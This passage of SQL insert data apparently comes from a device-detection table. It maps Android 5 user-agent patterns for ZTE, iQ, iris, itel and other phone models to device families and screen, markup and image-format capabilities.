Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z812) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z828) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z936L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z955L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z958) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z959) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z963VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZB500KG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZB551KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZP952) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE A2016) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE B2016) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE BLADE A110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE BLADE A5 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE BLADE L0510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE BLADE L110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE BLADE L111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A452) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A465) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A475) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A476) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade A570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade L6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade S6 Flex) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade V580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade V6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Blade X9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE C880A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE Grand S II LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE N939Sc) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T617) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T620) AppleWebKit/* (KHTML, like Gecko)','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T660) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T663) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE T920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZTE-Z812) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ZUK Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Zn1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; d-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; eMAX mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; emcee) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; gxq6580_we_l) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; gxq6580_weg_l) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; hi6210sft) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; hy_tough) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; i-mobile_IQ_BIG2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_imobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; i45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; i4D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; i508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; i5C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1401s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ9506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iQ9508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iRULU_V3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iris 505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iris 600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iris 755) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; iris758_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1407) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1408) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 